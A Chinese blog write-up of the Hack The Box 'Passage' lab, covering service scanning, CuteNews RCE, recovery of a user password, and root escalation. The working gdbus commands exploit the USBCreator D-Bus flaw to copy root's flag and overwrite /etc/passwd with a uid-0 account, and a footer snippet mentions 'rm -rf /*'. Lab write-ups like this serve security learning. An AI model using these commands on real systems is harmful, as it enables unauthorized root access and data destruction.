【Hack The Box】linux练习-- Passage

最新推荐文章于 2024-07-25 18:03:05 发布
最新推荐文章于 2024-07-25 18:03:05 发布
阅读量283 收藏
点赞数
分类专栏: Hack The Box 文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127992955
版权

HTB 学习笔记

【Hack The Box】linux练习-- Passage

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

在这里插入图片描述获得以下信息
admin - nadav@passage.htb
Paul Coles - paul@passage.htb
Kim Swift - kim@example.com
Sid Meier - sid@example.com
James - james@example.com
在这里插入图片描述进行了一下目录扫描
直接崩了,有waf

rss

页面右侧rss按钮源码显示xml在这里插入图片描述发现url还显示了一个页面
尝试
去掉rss.php显示登录页面在这里插入图片描述发现左上角标题显示这是个cms
在这里插入图片描述

存在许多漏洞,尝试发现版本信息
我将注册并登陆

存在文件上传
在这里插入图片描述
并且逛着逛着发现
版本2.1.2
在这里插入图片描述没毛病,开始利用rce
在这里插入图片描述随便找一个都能用
这里就不举例了

在这里插入图片描述
去到/home
发现两个用户
nadav
paul

我目前试图寻找其中任何一个用户的密码
我的第一思路是在数据库中获得

在这里插入图片描述
但是当我在他的github中看这个cms的时候,我发现他好像并没有数据库
那我就有点不会了,我先看看别的,作为一个www用户,我要开始下面的进程

分析

作为www用户,我第一步往往是在var内搜索

/var/www/html/CuteNews/cdata/users
发现了很多用户的base64

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现会包含密码,但是不是这个文件
最终获得的凭证为下面的这个,其他的base64解码之后没有任何的密码字段

paul:atlanta1

在这里插入图片描述su paul

提权

我的linpeas提醒我一个漏洞点
在这里插入图片描述
在这里插入图片描述
接着我寻求更稳定的shell
我尝试去拿ssh
在这里插入图片描述
发现署名是nadav
那我估计可以搞到这个用户了
现在把私钥复制粘贴出来
在我给予私钥600权限后,他可以正常使用
在这里插入图片描述
在这里插入图片描述

navad->root

作为一个用户,我将在用户目录下细致的查看,通常使用ls -la
我发现了两个奇怪可疑的东西
viminfo是一个vim的历史日志一类的东西
在这里插入图片描述
在这里插入图片描述提到了
如下两个文件

/etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf

这两个东西,但是我都不具有权限

USBCreator

缺陷
允许有权访问 sudoer 组中用户的攻击者绕过 sudo 程序强加的密码安全策略。 该漏洞允许攻击者以 root 身份覆盖具有任意内容的任意文件,而无需提供密码。 这通常会导致特权提升,例如,通过覆盖影子文件并为 root 设置密码。

读取

利用这个漏洞非常简单。 它需要一个 shell 作为sudo组,如果我有 nadav 的密码,我可能会 sudo su -得到一个壳,但我没有。

我会用这个错误来复制 root.txt到一个不存在的文件,比如 /dev/shm/.0xdf:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /dev/shm/dashabi true

cat /dev/shm/dashabi

在这里插入图片描述

写入

cp /etc/passwd passwd
openssl passwd -1 rong
echo 'rong:$1$7P/yeC8J$z2eywF.JUPm21Dx0IqVEp.:0:0:pwned:/root:/bin/bash' >> passwd 
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /dev/shm/passwd /etc/passwd true
su rong

在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HTB walkthrough -- Passage
sinat_36853972的博客
10-30 605
HTB walkthrough – Passage 信息收集 Ports 80/tcp open http Apache httpd 2.4.18 ((Ubuntu) 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) Domains passage.htb dir F12查看页面的源代码,看到很多路径(dirb一扫描就挂……只能纯看了) 以及在footer的位置,找到了这是一个CuteNews的c
靶机渗透_hackthebox__Writeup -6
qq_34717555的博客
11-11 1147
host:10.10.10.138 nmap 扫描一下 这次也尝试了一下自己的选项和A 选项发现A 比自己设置的要好很多不过这样被发现的几率也大了一些 自己配置的可以有很多降低被发现的选项 # Nmap 7.70 scan initiated Tue Aug 6 20:47:35 2019 as: nmap -A -o nmap.scan 10. 10.10.138 Nmap scan ...
Hackthebox------Jerry
大方子
11-24 3046
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
Hackthebox网络不稳定解决方式
汗的博客
12-07 1766
编译文件 更改proto udp为proto tcp 更改remote {serverAddressHere} 1337为remote {serverAddressHere} 443 更改<tls-auth>为<tls-crypt> 更改</tls-auth>为</tls-crypt>
Passage Re-ranking with BERT
Facico的博客
07-17 1066
Passage Re-ranking with BERT task 有一个给定的问题,要给出答案分三个阶段 1、通过一个标准的机制从语料库中见多大量可能与给定相关的文档 2、passage re-ranking:对这些文档打分并重paixu 3、分数前几的(前10、或前15等)的文档将会是这个问题答案的来源,用答案生成模型产出答案 这篇论文主要是研究第二个阶段 方法 要做的工作即是:对于一个询问qqq,一个候选文章did_idi​,给出一个分数sis_isi​ 询问为句子A,限制在64个token内 文章
linux mpi程序,Linux_用gdb调试mpi程序的一些心得, Linux下MPI (Message Passage Inter - phpStudy...
weixin_32742203的博客
05-10 381
用gdb调试mpi程序的一些心得Linux下MPI (Message Passage Interface) 的程序不太好调试,在windows下vs2005以上的IDE有集成的简便MPI调试工具,没有用过,有兴趣的可以试验一下。下面总结了一些最近在用MPI和c语言写程序时的调试经验(Ubuntu环境,c语言, mpich 1.2.7)。需要注意的几个小问题在编译程序的时候 –g 是一定要加的,不然...
gre阅读passage106-130
ujn20161222的博客
05-22 1525
passage106 3:32min passage1073:21min passage1083:05min passage109 9:13min According to Hill and Spicer, the term “nation-state” is a misnomer, since the ideal model of a monolingual, culturall...
gre阅读passage131-174
ujn20161222的博客
06-06 7020
passage131 3:11 2. The passage implies which of the following about the explanation mentioned in the highlighted text (This phenomenon… of metabolism)? 这个是问的文章的观点,因此是综合一下文章的立场,而不仅仅是一部分 The explana...
eclipse-rcp-2022-06-R-linux-gtk-x86_64.tar.gz
06-18
Eclipse IDE for RCP and RAP Developers... It contains the EGit tooling for accessing Git version control systems, and Eclipse Passage which helps with license management for Eclipse-based products.
Short-Passage.zip_Passage
09-20
**Dijkstra算法详解** Dijkstra算法,由荷兰计算机科学家艾兹格·迪科斯彻(Edsger W. Dijkstra)于1956年提出,是一种用于解决单源最短路径问题的算法。该算法适用于加权有向图或无向图,目标是从源节点到所有其他...
passage reading--the trashman.pdf
12-05
标题中的"The Trashman"指的是一个从事垃圾收集工作的人,描述提到了主人公Steve和他的伙伴在周六连续四个小时搬运垃圾的经历,以及他们在这个过程中与周围人的互动。这篇文章探讨了社会对垃圾工这一职业的普遍看法...
passage reading--the trashman.docx
12-05
【标题】:理解职业尊严与人际交流的重要性——从“垃圾人”视角 【描述】:本文通过描述作者在周六作为垃圾收集工的经历,探讨了不同社会角色间的互动以及人们对不同职业的态度,强调了尊重和理解各行各业工作者的...
eclipse-rcp-2022-06-R-linux-gtk-aarch64.tar.gz
06-18
Eclipse IDE for RCP and RAP Developers... It contains the EGit tooling for accessing Git version control systems, and Eclipse Passage which helps with license management for Eclipse-based products.
Linux初学基本命令
yuan20010401的博客
07-25 481
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux】进程间通信 —— 管道与 System V 版本通信方式
最新发布
qq_45666995的博客
07-25 705
一文详尽 管道与 System V 版本的进程间通信方式。
Linux下如何设置系统定时任务
小筱在线博客
07-24 432
需要注意的是,cron工具使用的时间是系统时间,所以请确保系统时间正确设置。其中,分钟表示指定的分钟数(0-59),小时表示指定的小时数(0-23),日表示指定的日期(1-31),月表示指定的月份(1-12),周表示指定的星期(0-7,其中0和7都表示星期天)。cron是一个守护进程,用于在指定的时间间隔执行指定的命令或脚本。这将在每天的凌晨1点到凌晨3点之间每隔30分钟执行指定的命令或脚本。这将在每天的凌晨1点和下午3点执行指定的命令或脚本。这将在每天的凌晨1点执行指定的命令或脚本。
linux】Shell脚本三剑客之awk命令的详细用法攻略
景天科技苑
07-24 4803
Linux和Unix系统中,awk是一种强大的文本处理工具,广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行,能够逐行读取输入文本文件,并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法,包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。
60个常见的 Linux 指令
yatingliu的博客
07-25 1164
是 “substitute user” 或 “switch user” 的缩写,它可以让你切换到另一个用户账户,包括 root 用户。是 “manual” 的缩写,通过它你可以访问系统的手册页(manual pages),这些手册页提供了详细的使用说明和参考信息。在一些 Linux 发行版中,adduser 是 useradd 的一个友好封装,功能上类似但提供了更多的默认设置和提示。-f, --force:强制删除,不提示错误信息,即使文件不存在也不会报错。:设置密码过期时间,单位为天。
private static String splicingTerms(Passage passage, int start, int end) { assert start <= end && end <= passage.getNumMatches() - 1; StringBuilder sb = new StringBuilder(); int idx = passage.getMatchStarts()[start]; for (int i = start; i <= end; i++) { if (i < end && passage.getMatchEnds()[i] > passage.getMatchStarts()[i + 1]) { idx = passage.getMatchStarts()[i]; continue; } sb.append(passage.getRealFragment(), idx - passage.getStartOffset(), passage.getMatchEnds()[i] - passage.getStartOffset()); idx = i < end ? passage.getMatchStarts()[i + 1] : idx; } return sb.toString(); }中sb.append(passage.getRealFragment(), idx - passage.getStartOffset(), passage.getMatchEnds()[i] - passage.getStartOffset());这一句索引越界
06-06
在这个方法中,sb.append(passage.getRealFragment(), idx - passage.getStartOffset(), passage.getMatchEnds()[i] - passage.getStartOffset())这一行代码的作用是将指定的一部分文本添加到StringBuilder对象中。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值